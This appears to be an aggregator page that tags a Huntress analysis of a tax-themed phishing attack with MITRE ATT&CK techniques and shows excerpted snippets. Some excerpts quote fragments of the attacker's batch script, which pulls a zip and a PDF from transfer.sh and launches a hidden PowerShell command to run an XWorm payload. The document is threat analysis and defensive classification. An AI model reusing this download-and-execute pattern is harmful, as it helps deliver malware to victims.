TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Gone Phishing: An Analysis of a Targeted User Attack | Huntress

2023-08-17 · Read original ↗

ATT&CK techniques detected

11 predictions
T1566Phishing
90%
“gone phishing : an analysis of a targeted user attack | huntress in the early days of information security, it was relatively easy to spot a phishing email in your inbox. a lot of the security awareness training available at the time did a great job of teaching users how to ident…”
T1204.002Malicious File
83%
“which huntress detects as “ suspicious bitsadmin commonly abused directories ”. the batch file contents appear as follows : @ echo off set url = https : / / transfer. sh / < redacted > / mail. zip set url2 = https : / / transfer. sh / < redacted > / w2. pdf powershell - windowsty…”
T1204.002Malicious File
81%
“”. as you can see, the batch file then embarks on a covert journey to : - download an archive and pdf file - open the pdf file ( illustrated in figure 2 ) on the user ’ s desktop - extract and launch the contents of the archive while the user views the pdf the w2. pdf file appear…”
T1566.001Spearphishing Attachment
73%
“” at least enough to raise an alarm. some phishing emails were also “ off - topic, ” having little to do with the business function of the target organization. however, the financial motivation of cybercrime has led to threat actors taking a much more targeted approach to gain ac…”
T1204.002Malicious File
63%
“windows executable / malware file does not have detection results on virustotal, but huntress analysts were able to determine that it is written in golang, and contains two interesting strings : go build id : " 5ecwtlmdcjd9y2olnmkh / umzeyupcjgz4nt8m2sqa / jv3cripsx8y1rkm3ac - v …”
T1204.002Malicious File
55%
“##te retrieving the executable file from the endpoint or submitting the file to automated or online analysis mechanisms. matthew ’ s analysis indicated that the xworm sample was identical in functionality to the variant described in the trellix blog post, albeit with a different …”
T1566.001Spearphishing Attachment
47%
“”. as you can see, the batch file then embarks on a covert journey to : - download an archive and pdf file - open the pdf file ( illustrated in figure 2 ) on the user ’ s desktop - extract and launch the contents of the archive while the user views the pdf the w2. pdf file appear…”
T1204.002Malicious File
46%
““ tax _ file ” windows shortcut / lnk file at this point, all indications are that the user expects to receive zipped archives containing files related to taxes, meaning that so far, nothing appears to be amiss and no alarm bells are ringing yet. the command embedded within the w…”
T1197BITS Jobs
37%
“which huntress detects as “ suspicious bitsadmin commonly abused directories ”. the batch file contents appear as follows : @ echo off set url = https : / / transfer. sh / < redacted > / mail. zip set url2 = https : / / transfer. sh / < redacted > / w2. pdf powershell - windowsty…”
T1053.005Scheduled Task
36%
“##te retrieving the executable file from the endpoint or submitting the file to automated or online analysis mechanisms. matthew ’ s analysis indicated that the xworm sample was identical in functionality to the variant described in the trellix blog post, albeit with a different …”
T1059.001PowerShell
34%
“which huntress detects as “ suspicious bitsadmin commonly abused directories ”. the batch file contents appear as follows : @ echo off set url = https : / / transfer. sh / < redacted > / mail. zip set url2 = https : / / transfer. sh / < redacted > / w2. pdf powershell - windowsty…”

Summary

Get an inside look at how threat actors use phishing and social engineering tactics to target users and infiltrate organizations.